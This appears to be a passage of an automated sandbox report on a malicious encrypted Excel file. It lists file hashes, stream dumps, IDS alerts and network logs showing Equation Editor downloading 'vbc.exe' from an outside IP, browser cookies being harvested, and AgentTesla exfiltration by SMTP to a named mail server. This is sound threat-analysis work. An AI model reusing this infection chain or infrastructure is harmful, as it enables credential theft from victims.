                                                                    C:\Users\user\AppData\Roaming\mb0hhwca.zd2\Chrome\Default\Cookies
                                                                    Process:C:\Users\Public\vbc.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):0.9650411582864293
                                                                    Encrypted:false
                                                                    SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                    MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                    SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                    SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                    SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                    Malicious:false
                                                                    Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\mb0hhwca.zd2\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                    Process:C:\Users\Public\vbc.exe
                                                                    File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                    Category:dropped
                                                                    Size (bytes):524288
                                                                    Entropy (8bit):0.08107860342777487
                                                                    Encrypted:false
                                                                    SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                    MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                    SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                    SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                    SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                    Malicious:false
                                                                    Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Process:C:\Users\Public\vbc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1120768
                                                                    Entropy (8bit):7.255968902164593
                                                                    Encrypted:false
                                                                    SSDEEP:12288:njjwxQMYvquwaHpLN39wfDM5prFXcZl+w5PTK787vEtC0pEyXEiyV4Gq:gxGquPHpLN39wfg5piR9KI7IiyUiyD
                                                                    MD5:42520170FE48AF70B3711BF86BDE77B0
                                                                    SHA1:8AF1983ADFF968D63D210145629F12EDBB4D1292
                                                                    SHA-256:E4FCC9753E14EBA1107DA53046098456E353EFDD9F81D88BD7199CC262E43E64
                                                                    SHA-512:29A865325E7E7708E4CFFD1AD5DBAC134D34D3AB1A369177E445F8FD12F2DAAD039AFDEEA0DA38C49B9323F3934404CA379FC7823EFBF431ED7136FC57907980
                                                                    Malicious:true
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..`............................>.... ........@.. ....................................@....................................K............................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc.......`......................@..B................ .......H........'...............+...|..........................................j+.&.(....(....(.....o....*..0..........+.&.+.&.(....(....9....& ....8g.....(.... .....:U...&..(.... ....(....:>...&..(.... ....8,.....(.... .....9....&..(....82... ............E........................t...........8....& ....8....*.V+.&..(....(....(....*..V+.&..(....(....(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o"...*.J+.&
                                                                    C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):330
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                    Malicious:true
                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    C:\Users\Public\vbc.exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1120768
                                                                    Entropy (8bit):7.255968902164593
                                                                    Encrypted:false
                                                                    SSDEEP:12288:njjwxQMYvquwaHpLN39wfDM5prFXcZl+w5PTK787vEtC0pEyXEiyV4Gq:gxGquPHpLN39wfg5piR9KI7IiyUiyD
                                                                    MD5:42520170FE48AF70B3711BF86BDE77B0
                                                                    SHA1:8AF1983ADFF968D63D210145629F12EDBB4D1292
                                                                    SHA-256:E4FCC9753E14EBA1107DA53046098456E353EFDD9F81D88BD7199CC262E43E64
                                                                    SHA-512:29A865325E7E7708E4CFFD1AD5DBAC134D34D3AB1A369177E445F8FD12F2DAAD039AFDEEA0DA38C49B9323F3934404CA379FC7823EFBF431ED7136FC57907980
                                                                    Malicious:true
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..`............................>.... ........@.. ....................................@....................................K............................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc.......`......................@..B................ .......H........'...............+...|..........................................j+.&.(....(....(.....o....*..0..........+.&.+.&.(....(....9....& ....8g.....(.... .....:U...&..(.... ....(....:>...&..(.... ....8,.....(.... .....9....&..(....82... ............E........................t...........8....& ....8....*.V+.&..(....(....(....*..V+.&..(....(....(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o"...*.J+.&

                                                                    Static File Info

                                                                    General

                                                                    File type:CDFV2 Encrypted
                                                                    Entropy (8bit):7.9956775745766056
                                                                    TrID:
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                    File name:AGG POWER RFQ.xlsx
                                                                    File size:1376256
                                                                    MD5:b6d32254c5e3faa7fb26cccabddad2f4
                                                                    SHA1:abf474e378247ebeb3300de929a50d0996286c01
                                                                    SHA256:fca7f5cda93c9f473a6c3e9c3857d19d69c25835fd71b21d8b1354f78b102397
                                                                    SHA512:33705d7290a7745c0e9dbd3619af16d50a98fa45819df54be4c640638f41a9cbc2400b54a19f0ed7b99b973f03cba6f5b7a19ea582a58b438196e98cb5dea53b
                                                                    SSDEEP:24576:Iw3AyaaFIkkLcYNbKkk7Sao4tdu4KeoSds+bpU988T6CB6u7Vz7Fnsdl:/z8lADdu4gas+bpi8y6A9VvFS
                                                                    File Content Preview:........................>.......................................................................................................|.......~...............z.......~..............................................................................................

                                                                    File Icon

                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OLE
                                                                    Number of OLE Files:1

                                                                    OLE File "AGG POWER RFQ.xlsx"

                                                                    Indicators

                                                                    Has Summary Info:False
                                                                    Application Name:unknown
                                                                    Encrypted Document:True
                                                                    Contains Word Document Stream:False
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:False

                                                                    Streams

                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                    General
                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                    File Type:data
                                                                    Stream Size:64
                                                                    Entropy:2.73637206947
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                    General
                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                    File Type:data
                                                                    Stream Size:112
                                                                    Entropy:2.7597816111
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                    General
                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                    File Type:data
                                                                    Stream Size:200
                                                                    Entropy:3.13335930328
                                                                    Base64 Encoded:False
                                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                    General
                                                                    Stream Path:\x6DataSpaces/Version
                                                                    File Type:data
                                                                    Stream Size:76
                                                                    Entropy:2.79079600998
                                                                    Base64 Encoded:False
                                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 1360984
                                                                    General
                                                                    Stream Path:EncryptedPackage
                                                                    File Type:data
                                                                    Stream Size:1360984
                                                                    Entropy:7.99985102724
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I . . . . . . . % . n . / W . C % . O . g . . f . g [ . P . z @ . . k . . G . . , 8 . . G . . I ? . . . x . B . . . . . . . . . . . r . . j . s . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U . . . ' . X . . . . ? . . . # U
                                                                    Data Raw:49 c4 14 00 00 00 00 00 25 f5 6e 1a 2f 57 cf 43 25 f6 4f e2 67 c5 e8 66 15 67 5b b5 50 c3 7a 40 b7 a4 6b d6 ab 47 d6 f9 2c 38 d8 9c 47 01 d5 49 3f a6 d6 f1 78 92 42 a1 e0 df 18 ae 95 8d a5 f4 ec ac 72 af 85 6a 1a 73 e5 d7 3f 0f f2 af 23 55 ac f3 04 27 87 58 c0 bf e5 d7 3f 0f f2 af 23 55 ac f3 04 27 87 58 c0 bf e5 d7 3f 0f f2 af 23 55 ac f3 04 27 87 58 c0 bf e5 d7 3f 0f f2 af 23 55
                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                    General
                                                                    Stream Path:EncryptionInfo
                                                                    File Type:data
                                                                    Stream Size:224
                                                                    Entropy:4.48853893529
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . . l . . . R f . . 5 . . ) T ! . n . . 6 . + . . . ^ . . . . H . . . . : . . . L & V . } ^ . . . e . . . . o * . . + . . . .
                                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    06/16/21-12:22:28.742921TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49166587192.168.2.22148.66.138.106
                                                                    06/16/21-12:22:32.112719TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49167587192.168.2.22148.66.138.106

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 16, 2021 12:20:52.426098108 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.562748909 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.562921047 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.563646078 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.705996990 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.706022024 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.706037998 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.706054926 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.706083059 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.706113100 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.706115961 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.842576027 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842607021 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842624903 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842641115 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842657089 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842675924 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842693090 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842689991 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.842708111 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.842711926 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.842714071 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.842725992 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.842741013 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979288101 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979382038 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979398966 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979414940 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979427099 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979439020 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979454994 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979458094 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979475021 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979479074 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979491949 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979492903 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979509115 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979518890 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979526043 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979537964 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979542017 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979551077 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979567051 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979574919 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979582071 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979589939 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979598045 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:52.979624033 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979626894 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.979635954 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:52.981499910 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116429090 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116476059 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116507053 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116518974 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116528988 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116560936 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116563082 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116589069 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116610050 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116631031 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116657019 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116683006 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116692066 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116693020 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116736889 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116739035 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116774082 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116776943 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116807938 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116810083 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116844893 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116847992 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116882086 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116885900 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116914988 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116919041 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116950035 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.116950989 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116986036 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.116988897 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117018938 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117022038 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117052078 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117055893 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117085934 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117089033 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117121935 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117125988 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117160082 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117162943 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117192030 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117202044 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117224932 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117229939 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117258072 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117268085 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117290974 CEST8049165192.3.141.146192.168.2.22
                                                                    Jun 16, 2021 12:20:53.117314100 CEST4916580192.168.2.22192.3.141.146
                                                                    Jun 16, 2021 12:20:53.117322922 CEST8049165192.3.141.146192.168.2.22

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jun 16, 2021 12:22:25.770656109 CEST5219753192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:25.839512110 CEST53521978.8.8.8192.168.2.22
                                                                    Jun 16, 2021 12:22:25.840090036 CEST5219753192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:26.021575928 CEST53521978.8.8.8192.168.2.22
                                                                    Jun 16, 2021 12:22:26.022252083 CEST5219753192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:26.083831072 CEST53521978.8.8.8192.168.2.22
                                                                    Jun 16, 2021 12:22:29.344799042 CEST5309953192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:29.409277916 CEST53530998.8.8.8192.168.2.22
                                                                    Jun 16, 2021 12:22:29.409868002 CEST5309953192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:29.468858004 CEST53530998.8.8.8192.168.2.22
                                                                    Jun 16, 2021 12:22:29.469491005 CEST5309953192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:29.530682087 CEST53530998.8.8.8192.168.2.22
                                                                    Jun 16, 2021 12:22:29.531307936 CEST5309953192.168.2.228.8.8.8
                                                                    Jun 16, 2021 12:22:29.592813015 CEST53530998.8.8.8192.168.2.22

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jun 16, 2021 12:22:25.770656109 CEST192.168.2.228.8.8.80x208aStandard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:25.840090036 CEST192.168.2.228.8.8.80x208aStandard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:26.022252083 CEST192.168.2.228.8.8.80x208aStandard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.344799042 CEST192.168.2.228.8.8.80xc590Standard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.409868002 CEST192.168.2.228.8.8.80xc590Standard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.469491005 CEST192.168.2.228.8.8.80xc590Standard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.531307936 CEST192.168.2.228.8.8.80xc590Standard query (0)mail.alkhaleejautoparts.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jun 16, 2021 12:22:25.839512110 CEST8.8.8.8192.168.2.220x208aNo error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:26.021575928 CEST8.8.8.8192.168.2.220x208aNo error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:26.083831072 CEST8.8.8.8192.168.2.220x208aNo error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.409277916 CEST8.8.8.8192.168.2.220xc590No error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.468858004 CEST8.8.8.8192.168.2.220xc590No error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.530682087 CEST8.8.8.8192.168.2.220xc590No error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.592813015 CEST8.8.8.8192.168.2.220xc590No error (0)mail.alkhaleejautoparts.com148.66.138.106A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • 192.3.141.146

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.2249165192.3.141.14680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jun 16, 2021 12:20:52.563646078 CEST0OUTGET /win/vbc.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 192.3.141.146
                                                                    Connection: Keep-Alive
                                                                    Jun 16, 2021 12:20:52.705996990 CEST1INHTTP/1.1 200 OK
                                                                    Date: Wed, 16 Jun 2021 10:20:52 GMT
                                                                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                    Last-Modified: Wed, 16 Jun 2021 05:38:46 GMT
                                                                    ETag: "111a00-5c4db81175295"
